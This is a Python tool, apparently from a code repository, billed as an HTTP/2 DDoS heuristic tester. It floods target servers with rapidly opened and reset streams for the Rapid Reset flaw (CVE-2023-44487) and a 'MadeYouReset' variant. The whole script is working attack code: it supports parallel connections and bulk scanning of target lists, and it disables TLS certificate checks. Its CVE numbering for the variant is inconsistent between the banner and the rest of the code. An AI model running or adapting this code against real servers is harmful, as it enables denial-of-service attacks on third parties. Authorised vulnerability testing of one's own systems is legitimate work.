README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import ssl
import socket
import time
from urllib.parse import urlparse
from datetime import datetime
import json
import csv
import random
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import (
SettingsAcknowledged, ConnectionTerminated,
PingAckReceived, WindowUpdated, RemoteSettingsChanged
)
from colorama import Fore, Style, init
init(autoreset=True)
def print_banner():
banner = f"""
{Fore.CYAN}{Style.BRIGHT}
╔╦╗┌─┐┌┬┐┌─┐╦ ╦┌─┐┬ ┬╦═╗┌─┐┌─┐┌─┐┌┬┐
║║║├─┤ ││├┤ ╚╦╝│ ││ │╠╦╝├┤ └─┐├┤ │
╩ ╩┴ ┴─┴┘└─┘ ╩ └─┘└─┘╩╚═└─┘└─┘└─┘ ┴
{Style.RESET_ALL}
"""
print(banner)
print(f"{Fore.YELLOW}[ HTTP/2 DDoS Heuristic Tester | CVE-2023-44487 & CVE-2025-8671 ]{Style.RESET_ALL}\n")
print(f"{Fore.WHITE}[ [email protected] | m10sec 2025 ]{Style.RESET_ALL}\n")
def check_http2_support(host, port=443, tls=True, timeout=5.0):
"""Devuelve True si el host negocia HTTP/2 vía ALPN."""
try:
raw = socket.create_connection((host, port), timeout=timeout)
if tls:
ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2", "http/1.1"])
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
s = ctx.wrap_socket(raw, server_hostname=host)
proto = s.selected_alpn_protocol()
s.close()
return proto == "h2"
else:
raw.close()
return False
except Exception:
return False
class H2Client:
def __init__(self, host, port, tls=True, server_name=None, timeout=6.0):
self.host = host
self.port = port
self.tls = tls
self.server_name = server_name or host
self.timeout = timeout
self.sock = None
self.conn = None
self.metrics = {
"goaway": 0,
"goaway_codes": [],
"rst_sent": 0,
"rst_rate_per_s": 0.0,
"streams_opened": 0,
"pings": 0,
"ping_rtt_ms": [],
"remote_max_concurrent_streams": None,
"throttled": False,
"errors": []
}
def _wrap_tls(self, raw):
ctx = ssl.create_default_context()
# admitir h2 y http/1.1 para mayor compatibilidad en negociación
ctx.set_alpn_protocols(["h2", "http/1.1"])
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return ctx.wrap_socket(raw, server_hostname=self.server_name)
def connect(self):
try:
raw = socket.create_connection((self.host, self.port), timeout=self.timeout)
self.sock = self._wrap_tls(raw) if self.tls else raw
self.sock.settimeout(self.timeout)
cfg = H2Configuration(client_side=True, header_encoding="utf-8")
self.conn = H2Connection(config=cfg)
self.conn.initiate_connection()
self._send(self.conn.data_to_send())
# leer cualquier respuesta inicial (SETTINGS)
self._drain(0.2)
except Exception as e:
raise RuntimeError(f"Error conectando a {self.host}:{self.port} -> {e}")
def close(self):
try:
if self.sock:
self.sock.close()
except Exception:
pass
def _send(self, data: bytes):
if not data:
return
try:
self.sock.sendall(data)
except Exception as e:
self.metrics["errors"].append(f"send_err:{e}")
def _drain(self, dur=0.01):
"""Lee y procesa eventos H2 durante 'dur' segundos (aprox)."""
end = time.time() + dur
while time.time() < end:
try:
data = self.sock.recv(65535)
if not data:
break
events = self.conn.receive_data(data)
for ev in events:
if isinstance(ev, ConnectionTerminated):
self.metrics["goaway"] += 1
# ev.error_code puede existir o no; protegemos
try:
self.metrics["goaway_codes"].append(ev.error_code)
if ev.error_code in (0xb, 0x1): # ENHANCE_YOUR_CALM / PROTOCOL_ERROR
self.metrics["throttled"] = True
except Exception:
pass
elif isinstance(ev, RemoteSettingsChanged):
# changed_settings es un dict: code -> SettingChanged
try:
for code, s in ev.changed_settings.items():
# SETTINGS_MAX_CONCURRENT_STREAMS = 0x3 / 3
if code == 0x3 or code == 3:
# s tiene atributo new_value
self.metrics["remote_max_concurrent_streams"] = getattr(s, "new_value", None)
except Exception:
pass
elif isinstance(ev, PingAckReceived):
try:
sent_ns = int.from_bytes(ev.ping_data, "big")
rtt_ms = (time.time_ns() - sent_ns) / 1e6
self.metrics["ping_rtt_ms"].append(rtt_ms)
except Exception:
self.metrics["ping_rtt_ms"].append(-1)
# enviar cualquier frame que la librería genere (ACKs, etc)
self._send(self.conn.data_to_send())
except socket.timeout:
break
except Exception as e:
self.metrics["errors"].append(str(e))
break
def ping(self):
"""Usa H2Connection.ping para obtener los bytes que hay que enviar."""
try:
opaque = int(time.time_ns()).to_bytes(8, "big")
payload = self.conn.ping(opaque)
self._send(payload)
self.metrics["pings"] += 1
# vaciar y esperar ack corto
self._drain(0.25)
except Exception as e:
self.metrics["errors"].append(f"ping_err:{e}")
def rapid_reset(self, authority, path="/", n_streams=100, header_extra=None, pace_s=0.0):
"""CVE-2023-44487 baseline: abre streams y los resetea inmediatamente."""
headers_base = [
(":method", "GET"),
(":authority", authority),
(":scheme", "https" if self.tls else "http"),
(":path", path),
("user-agent", "h2-check/rr")
]
if header_extra:
headers_base.extend(header_extra)
start = time.time()
for _ in range(n_streams):
try:
sid = self.conn.get_next_available_stream_id()
# end_stream=True para simular petición completa y después resetear
self.conn.send_headers(sid, headers_base, end_stream=True)
# resetear rápido
self.conn.reset_stream(sid, error_code=0x8) # CANCEL
self._send(self.conn.data_to_send())
self.metrics["rst_sent"] += 1
self.metrics["streams_opened"] += 1
self._drain(0.0)
if pace_s:
time.sleep(pace_s)
except Exception as e:
self.metrics["errors"].append(f"rapid_err:{e}")
break
dur = max(0.001, time.time() - start)
self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
self._drain(0.5)
def made_you_reset_variation(self, authority, path="/", n_streams=100, jitter_ms=2):
"""CVE-2025-25063 heurística: HEADERS end_stream=False + pequeño jitter y RST."""
headers_base = [
(":method", "GET"),
(":authority", authority),
(":scheme", "https" if self.tls else "http"),
(":path", path),
("user-agent", "h2-check/myr")
]
start = time.time()
for i in range(n_streams):
try:
sid = self.conn.get_next_available_stream_id()
# Enviamos HEADERS sin finalizar stream (end_stream=False)
self.conn.send_headers(sid, headers_base, end_stream=False)
self._send(self.conn.data_to_send())
# jitter pequeño antes del RESET
time.sleep(random.uniform(0, jitter_ms/1000.0))
self.conn.reset_stream(sid, error_code=0x8)
self._send(self.conn.data_to_send())
self.metrics["rst_sent"] += 1
self.metrics["streams_opened"] += 1
if i % 20 == 0:
# pedimos ping para medir RTT y hacer ruido
self.ping()
self._drain(0.0)
except Exception as e:
self.metrics["errors"].append(f"myr_err:{e}")
break
dur = max(0.001, time.time() - start)
self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
self._drain(0.8)
def classify(metrics):
go_enhance = any(code == 0xb for code in metrics["goaway_codes"])
high_rate = metrics["rst_rate_per_s"] > 500
no_limits = (metrics["remote_max_concurrent_streams"] in (None, 0) or
(isinstance(metrics["remote_max_concurrent_streams"], int) and metrics["remote_max_concurrent_streams"] > 1000))
rtt_spikes = any(rtt > 200 for rtt in metrics["ping_rtt_ms"] if rtt >= 0)
if not metrics["goaway"] and no_limits and high_rate and rtt_spikes:
verdict = "LIKELY_VULN"
elif not go_enhance and (high_rate or no_limits):
verdict = "POSSIBLE"
else:
verdict = "UNLIKELY"
return verdict
def scan_for_vulnerability(target_url, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0):
"""Devuelve un dict estilo resumen con soporte HTTP/2 y veredicto heurístico."""
u = urlparse(target_url)
tls = (u.scheme == "https")
port = u.port or (443 if tls else 80)
authority = u.netloc.split(":")[0] or u.path # fallback si se pasa solo host
http2_supported = check_http2_support(authority, port=port, tls=tls, timeout=timeout)
result = {
"Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"URL": target_url,
"HTTP/2 Support": "Yes" if http2_supported else "No",
"Vulnerable": "UNKNOWN",
"Details": "No se pudo completar el análisis"
}
if not http2_supported:
result["Details"] = "El servidor no negoció HTTP/2 (ALPN)."
return result
c = H2Client(authority, port, tls=tls, server_name=authority, timeout=timeout)
try:
c.connect()
if mode in ("rapid", "both"):
c.rapid_reset(authority, path=u.path or "/", n_streams=streams, pace_s=pace)
if mode in ("myr", "both"):
c.made_you_reset_variation(authority, path=u.path or "/", n_streams=streams, jitter_ms=jitter)
verdict = classify(c.metrics)
mapping = {"LIKELY_VULN": "LIKELY", "POSSIBLE": "POSSIBLE", "UNLIKELY": "UNLIKELY"}
result["Vulnerable"] = mapping.get(verdict, verdict)
result["Details"] = (
f"streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
f"errors={len(c.metrics['errors'])}"
)
except Exception as e:
result["Vulnerable"] = "UNKNOWN"
result["Details"] = f"Error durante prueba: {e}"
finally:
c.close()
return result
def _normalize_target(s: str) -> str:
s = (s or "").strip()
if not s:
return s
if not s.startswith("http"):
s = "https://" + s
return s
def interactive_menu():
print("\n=== HTTP/2 DDoS Heuristic Tester ===")
print("1) CVE-2023-44487 (Rapid Reset)")
print("2) CVE-2025-25063 (MadeYouReset)")
print("3) Ambos (comparativa)")
print("4) Salir")
choice = input("Selecciona opción [1-4]: ").strip() or "2"
if choice not in {"1","2","3"}:
print("Saliendo.")
return
target = _normalize_target(input("Target (https://dominio o http://ip): ").strip())
if not target:
print("No se ingresó target. Bye Bye sweet hearth.")
return
try:
streams = int((input("Streams por conexión [200]: ") or "200").strip())
except Exception:
streams = 200
try:
jitter = int((input("Jitter ms (solo MYR) [2]: ") or "2").strip())
except Exception:
jitter = 2
mode = "rapid" if choice == "1" else ("myr" if choice == "2" else "both")
summary = scan_for_vulnerability(target, mode=mode, streams=streams, jitter=jitter)
print(json.dumps(summary, ensure_ascii=False, indent=2))
def bulk_scan_from_txt(path, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0,
out_json=None, out_csv=None, line_by_line=True):
results = []
try:
with open(path, "r", encoding="utf-8") as f:
lines = [ln.strip() for ln in f if ln.strip() and not ln.strip().startswith("#")]
except Exception as e:
print(f"[!] No pude leer '{path}': {e}")
return
for target in lines:
target_url = _normalize_target(target)
try:
res = scan_for_vulnerability(target_url, mode=mode, streams=streams,
timeout=timeout, jitter=jitter, pace=pace)
except Exception as e:
res = {
"Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"URL": target_url,
"HTTP/2 Support": "UNKNOWN",
"Vulnerable": "UNKNOWN",
"Details": f"Error general: {e}"
}
results.append(res)
if line_by_line:
print(json.dumps(res, ensure_ascii=False))
if out_json:
try:
with open(out_json, "w", encoding="utf-8") as jf:
json.dump(results, jf, ensure_ascii=False, indent=2)
print(f"[+] Guardado JSON en {out_json}")
except Exception as e:
print(f"[!] No pude guardar JSON en {out_json}: {e}")
if out_csv:
try:
with open(out_csv, "w", encoding="utf-8", newline="") as cf:
writer = csv.DictWriter(cf, fieldnames=["Timestamp","URL","HTTP/2 Support","Vulnerable","Details"])
writer.writeheader()
for r in results:
writer.writerow(r)
print(f"[+] Guardado CSV en {out_csv}")
except Exception as e:
print(f"[!] No pude guardar CSV en {out_csv}: {e}")
# -----------------------------
# Punto de entrada
# -----------------------------
def main():
print_banner()
ap = argparse.ArgumentParser(description="HTTP/2 MadeYouReset heuristic checker")
ap.add_argument("target", nargs="?", help="URL objetivo, p.ej. https://example.com (opcional si usas --menu o --targets-file)")
ap.add_argument("--path", default="/", help="Ruta a solicitar")
ap.add_argument("--mode", choices=["rapid", "myr", "both"], default="myr",
help="Prueba: rapid (CVE-2023-44487), myr (CVE-2025-25063), both")
ap.add_argument("--conns", type=int, default=1, help="Conexiones paralelas")
ap.add_argument("--streams", type=int, default=200, help="Streams por conexión")
ap.add_argument("--timeout", type=float, default=6.0, help="Timeout socket")
ap.add_argument("--pace", type=float, default=0.0, help="Pausa entre streams (rapid)")
ap.add_argument("--jitter", type=int, default=2, help="Jitter ms (myr)")
ap.add_argument("--json", action="store_true", help="Salida JSON resumida (scan_for_vulnerability)")
ap.add_argument("--menu", action="store_true", help="Abrir menú interactivo")
ap.add_argument("--targets-file", help="Ruta a TXT con un target por línea (modo bulk)")
ap.add_argument("--out-json", help="Guardar resultados bulk en archivo JSON")
ap.add_argument("--out-csv", help="Guardar resultados bulk en archivo CSV")
args = ap.parse_args()
# Bulk
if args.targets_file:
bulk_scan_from_txt(
args.targets_file,
mode=args.mode,
streams=args.streams,
timeout=args.timeout,
jitter=args.jitter,
pace=args.pace,
out_json=args.out_json,
out_csv=args.out_csv,
line_by_line=True,
)
return
# menu o falta target
if args.menu or not args.target:
interactive_menu()
return
# normalizar target si el usuario no incluye scheme
args.target = _normalize_target(args.target)
u = urlparse(args.target)
tls = (u.scheme == "https")
port = u.port or (443 if tls else 80)
authority = u.netloc.split(":")[0]
if args.json:
summary = scan_for_vulnerability(
args.target,
mode=args.mode,
streams=args.streams,
timeout=args.timeout,
jitter=args.jitter,
pace=args.pace
)
print(json.dumps(summary, ensure_ascii=False, indent=2))
return
clients = []
try:
for _ in range(args.conns):
c = H2Client(authority, port, tls=tls, server_name=authority, timeout=args.timeout)
try:
c.connect()
clients.append(c)
except Exception as e:
print(f"[!] No pude crear cliente para {authority}:{port} -> {e}")
if not clients:
print("[!] No se pudo establecer ninguna conexión H2. Saliendo.")
return
for c in clients:
if args.mode in ("rapid", "both"):
c.rapid_reset(authority, path=args.path, n_streams=args.streams, pace_s=args.pace)
if args.mode in ("myr", "both"):
c.made_you_reset_variation(authority, path=args.path, n_streams=args.streams, jitter_ms=args.jitter)
print("\n=== Resultados ===")
for i, c in enumerate(clients, 1):
v = classify(c.metrics)
print(f"[Conn {i}] verdict={v} streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
f"rtt_ms={','.join(f'{x:.0f}' if x>=0 else '-' for x in c.metrics['ping_rtt_ms'])} "
f"errors={len(c.metrics['errors'])}")
finally:
for c in clients:
c.close()
if __name__ == "__main__":
main()